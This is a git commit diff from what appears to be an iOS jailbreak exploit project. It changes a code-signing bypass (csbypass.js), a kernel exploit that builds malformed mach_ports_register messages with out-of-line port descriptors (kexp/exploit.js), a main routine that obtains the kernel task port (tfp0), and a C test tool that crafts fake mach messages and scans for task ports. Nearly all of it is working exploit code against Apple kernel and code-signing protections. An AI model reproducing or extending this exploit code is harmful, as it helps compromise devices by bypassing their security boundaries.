diff options
| author | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
| commit | 42647b796f0f54122e7f46522d8e681825daf54b (patch) | |
| tree | 6886bfea221b15579b84ff13d1b850a1ac9f5fcf | |
| parent | d1da310f02adc0e9b5f8656ea063fd3231901611 (diff) | |
dump
| -rw-r--r-- | src/js/csbypass.js | 2 | ||||
| -rwxr-xr-x | src/js/kexp/exploit.js | 8 | ||||
| -rw-r--r-- | src/js/main.js | 6 | ||||
| -rwxr-xr-x | tools/testlol.c | 26 |
4 files changed, 29 insertions, 13 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js index 8f7a56e..3065099 100644 --- a/src/js/csbypass.js +++ b/src/js/csbypass.js @@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) { printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict)); scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12)); callnarg(CFShow_addr + get_dyld_shc_slide(), dict); - callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test); + call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0); printf("fuck1\n"); callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width)); printf("fuck2\n"); diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 8447c46..473bc6e 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) { write_u32(InP + 0x18, 1); write_u32(InP + 0x1c, init_port_set); write_u32(InP + 0x20, real_count); - write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24))); + write_u32(InP + 0x24, 0x0213c600); write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0)); write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4)); write_u32(InP + 0x30, fake_count); @@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) { function mach_ports_lookup_shit() { printf("fuck\n"); var arrz = shit_heap(4); + var arrz2 = shit_heap(4); printf("fuck\n"); - write_u32(arrz, 0); + write_u32(arrz, arrz2); + write_u32(arrz2, 0); printf("fuck\n"); var sz = shit_heap(4);; printf("fuck\n"); @@ -359,6 +361,7 @@ function mach_ports_lookup_shit() { // var mts = mach_task_self(); printf("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("mpl success\n"); return read_u32(read_u32(arrz) + 8); @@ -461,7 +464,6 @@ again: while (true) { // while (true) { // // } - scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("fuck\n"); // var fake_port = read_u32(read_u32(arrz) + 8); diff --git a/src/js/main.js b/src/js/main.js index 5c45e85..75d730d 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -77,14 +77,16 @@ function main() { large_buf[0] = 0x41424344; printf("%x\n", read_u32(large_buf_ptr)); + setup_fancy_rw(); + // csbypass(); // return; - setup_fancy_rw(); printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0')); - + +//return; var tfp0 = get_kernel_task(); printf("tfp0=%x\n", tfp0); diff --git a/tools/testlol.c b/tools/testlol.c index 85c9cb2..d39bf47 100755 --- a/tools/testlol.c +++ b/tools/testlol.c @@ -199,20 +199,23 @@ int main(int argc, char* argv[]) { Request *InP = &Mess.In;
Reply *OutP = &Mess.Out;
-#if 0
InP->msgh_body.msgh_descriptor_count = 1;
- InP->init_port_set.address = (void*)(init_port_set);
- InP->init_port_set.count = real_count;
+ InP->init_port_set.address = (void*)(0x41414141);
+ InP->init_port_set.count = 0x42424242;
InP->init_port_set.disposition = 19;
InP->init_port_set.deallocate = FALSE;
InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
InP->NDR = NDR_record;
- InP->init_port_setCnt = fake_count; // was real_count
+ InP->init_port_setCnt = 0x43434343; // was real_count
InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- InP->Head.msgh_remote_port = task;
- InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_remote_port = 0x45454545;
+ InP->Head.msgh_local_port = 0x69696969;
InP->Head.msgh_id = 3403;
-#endif
+
+ for (int i = 0; i < 0x100; i++) {
+ printf("%02x", ((uint8_t*)InP)[i]);
+ }
+ printf("\n");
printf(" InP->msgh_body.msgh_descriptor_count %p %p\n", ((void*)& InP->msgh_body.msgh_descriptor_count ) - ((void*)InP), sizeof( InP->msgh_body.msgh_descriptor_count ));
printf(" InP->init_port_set.address %p %p\n", ((void*)& InP->init_port_set.address ) - ((void*)InP), sizeof( InP->init_port_set.address ));
@@ -255,6 +258,15 @@ typedef struct { printf("%p\n", ((void*)ptraaa) - ((void*)kportaaa));
+ printf("===validity check\n");
+
+ uintptr_t whatever;
+
+ for (mach_port_t i = 0; i < 0x1000000; i++) {
+ if (pid_for_task(i, &whatever) == KERN_SUCCESS)
+ printf("0x%x\n", i);
+ }
+
#if 0
kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if(ret == KERN_SUCCESS)
|